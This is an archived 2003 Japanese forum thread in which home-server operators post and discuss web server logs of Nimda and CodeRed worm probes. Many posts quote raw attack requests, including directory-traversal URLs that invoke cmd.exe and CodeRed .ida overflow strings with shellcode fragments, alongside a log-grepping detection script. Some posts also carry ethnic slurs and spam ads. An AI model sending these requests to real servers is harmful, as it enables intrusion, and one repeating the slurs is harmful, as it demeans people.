1read 100read
2012年3月自宅サーバ383: この鯖ワームにやられてます (332) TOP カテ一覧 スレ一覧 2ch元 削除依頼
SPAMメール対策どうしてる? (212)
ルター設定 (151)
自宅鯖の熱対策について (140)
【無料】 Solaris10で自宅サーバー 【Unix系】 (159)
自鯖でいくら稼いでる? (323)
お前らサーバー監視ツール何使ってる? (244)

この鯖ワームにやられてます


1 :03/02/08
自宅で鯖も善いけど、管理はちゃんとしようよ。
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!
管理者がこの板みて、対処を期待する。

2 :03/02/08
2 get!!
おー鯖管理に関する話題だな。
でもな、ワームによってはIP詐称してるのもアルからな
そういうのはどうする>>1 ?

3 :03/02/08
IP詐称されてるってのが分かるだけでも当人?としては
いいかも。やっぱ気持ち悪いじゃん。
ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!

4 :03/02/08
ラストクリスマスキタ━━━━━━(゚∀゚)━━━━━━━!!!!!

5 :03/02/08
218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
知らんなら本人に気づいて欲しいという意味でも晒しとくよ

6 :03/02/08
無駄。apache のlogに記録されない様にするのがいい。

7 :03/02/08
>>5
あんたYahooBBかい?

8 :03/02/08
>>4
それはワム

9 :03/02/08
>>7
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?

10 :03/02/08
>>6
どうやってやるんですか?

11 :03/02/08
>>9
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・

12 :03/02/08
>>10
ここでも嫁
ttp://www.zdnet.co.jp/help/tips/linux/l0324.html

13 :03/02/08
>>4
>>8
ワラタ

14 :03/02/08
こういうのってプロバイダに通報した方がいいの?

15 :03/02/08
>>11
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない)
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。

16 :03/02/09
仮にも管理者が決まっている鯖なら、いくらぐーたらでも
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。
今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。

17 :03/02/10
久々にNIMDA来た
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447

18 :03/02/10
久々にCodeRed来た
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"

19 :03/02/10
ぷららのDDNSだけどぷららも結構多いよ。
nslookupで引くとほとんどがぷららさん・・・

20 :03/02/10
>19 いまだにnslookup
( ´,_ゝ`)フ゜ッ

21 :03/02/10
ネームサーバをさせるわけでもないのに、
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい? >>20

22 :03/02/10
218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"

23 :03/02/10
自動的にワームからのアクセスがあったときに
root@アクセス元IPアドレス
とかに警告メール出すようなソフトだれか作ってくり。

24 :03/02/10
>>23
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz

25 :03/02/10
>>24
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2
Stop in /tmp/Apache-CodeRed-1.07

26 :03/02/10
http://bbs.1oku.com/bbs/bbs.phtml?id=rantyan
★ココだ★ココだ★

27 :03/02/10
>>23
警告メールは、やっぱり、
「回線切って、首つって、氏ね」
みたいなの?

28 :03/02/11
>>19
それってぷららのDDNS使ってるからじゃない?
Nimdaはご近所さん攻撃するものだし。

29 :03/02/11
確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。

30 :03/02/12
>>23
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。

31 :03/02/12
ピコ郎

32 :03/02/13
久々だな。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226

33 :03/02/13
最近codered多くない? しばらくこなかったけど
最近1日3回位くるYO ちなみに屋不ーBB

34 :03/02/13
[Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe
俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・

35 :03/02/13
>>33
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。

36 :03/02/13
……と、access_logをgrepして気が付きますた。
全然久々じゃないじゃないか (w

37 :03/02/15
お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円してくんだよ
もっと勉強してから立てれ

38 :03/02/15
漏れの所も…
その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d
その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d
両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ(涙

39 :03/02/23
一週間で1000リクエストほどワーム来るね

40 :03/02/24
うちもぷららのDDNS使ってますが、サーバ開通直後に
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...

41 :03/02/24
やっぱり偶然でした(T_T)
どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...

42 :03/02/28
友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。
相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と
いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。

43 :03/03/08
少々のワームやウイルスはいちいちかまってられないが、
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…
鯖とは関係ない話だがな…

44 :03/03/09
218.9.76.4 - - [07/Mar/2003:22:22:26 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
いい加減蝋人形にしちゃうよ?!

45 :03/03/09
218.9.6.222 - - [08/Mar/2003:12:13:13 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
いい加減蝋人形にしちゃうよ?!

46 :03/03/09
本日のニムダアクセス
韓国 61.250.216.1
中国 61.132.75.252

47 :03/03/09
#!/bin/sh

if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi

egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more

exit 0

48 :03/03/09
ワラタ

49 :03/03/10
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいm(__)m

50 :03/03/10
これはどうなのかな。。。
[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe

51 :03/03/10
  ∋8ノノハ.∩
   川o・-・)ノ <先生!こんなのがありました!
__/ /    /   
\(_ノ ̄ ̄ ̄\
||ヽ|| ̄ ̄ ̄ ̄||
 ...|| ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/

52 :03/03/11
うちも、チョンとチャンコロばっかりです。
http://www.arearesearch.co.jp/ip-kensaku.html
今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった

53 :03/03/11

       ま    た    中    国    か


54 :03/03/12
default.ida?XXXXX...増殖中。
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar

55 :03/03/13
上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね?
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、

56 :03/03/13
http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし!!★超おすすめ★

57 :03/03/13
>>52
国際的ですね(w

58 :03/03/13
(^^)

59 :03/03/13
ほぼ毎日、韓国、中国。たまに日本。

60 :03/03/14
韓国と中国がものすごく多い。
あと、日本国内だと普通の企業とか。

61 :03/03/14
ここ数日はCodeRed IIが多いですね、国内外を問わず。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。

62 :03/03/14
我々に直接的な害はないんですがね。
見てて気持ち悪いですよ。

63 :03/03/15
こんなの出てた
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276

64 :03/03/16
CodeRedII多いなぁ
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX

65 :03/03/16
218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX
流行ってるね。

66 :03/03/16
設置者は居ても、管理者が居ない鯖が多いということで

67 :03/03/16
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
 直通  090−8505−3086
URL  http://www.h5.dion.ne.jp/~grobal/
メール  hentaimtt@k9.dion.ne.jp
   グローバル探偵事務局 

68 :03/03/16
003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1"
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

69 :03/03/18
>68
規約ってなんだっ

70 :03/03/19
CodeRedIIウザー(´Д`;
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?
中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。

71 :03/03/20
迷惑。マシンごとってくれ、とくに220.13.136.85
YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX

72 :03/03/20
>>71
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。

73 :03/03/23
61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、
www.okxa.comというドメインのサイトですた。
何、ココ?エロゲサイト?

74 :03/03/25
うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。

75 :03/03/25
>>73
下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?

76 :03/03/26
まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから
身に覚えのある人はパッチをあてて欲しいですね

77 :03/04/02
最近やたらCodeRedII多くないかい?
218.***.***.***から目茶苦茶(100/day程度)来るんだけど
あーうぜー

78 :03/04/02
初めて見た。
210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない

79 :03/04/03
SYN Flood Attackしてくる香具師もなんとかしる

80 :03/04/05
>78
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね?
相手はコーリャンのIISでした。

81 :03/04/06
211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
ウザい。

82 :03/04/06
中国、韓国からのアクセスは禁止!!

83 :03/04/07
どかーん!
(⌒⌒⌒)
 ||
/ ̄ ̄ ̄ ̄ ̄\
| ・ U      |
| |ι         |つ
U||  ̄ ̄ ||
   ̄      ̄
もうおこったぞう
61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER -->
218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom -->
218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center -->
220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. -->
220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom -->
アク禁

84 :03/04/08
>80
>最初はイタズラされてるだけあかと持ったんだけど、
いたずらしないで頂きたい。
ログ汚れ過ぎ
IIS狙われすぎ
ついでにsage過ぎ
あれ以来きてない。
>83
正解かも

85 :03/04/09
どうもアタックの内容がアレなせいで落ちてるっぽいのよね
IPアドレスじゃなくてドメインで狙われてるっぽいし・・・

86 :03/04/09
これは?
09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184
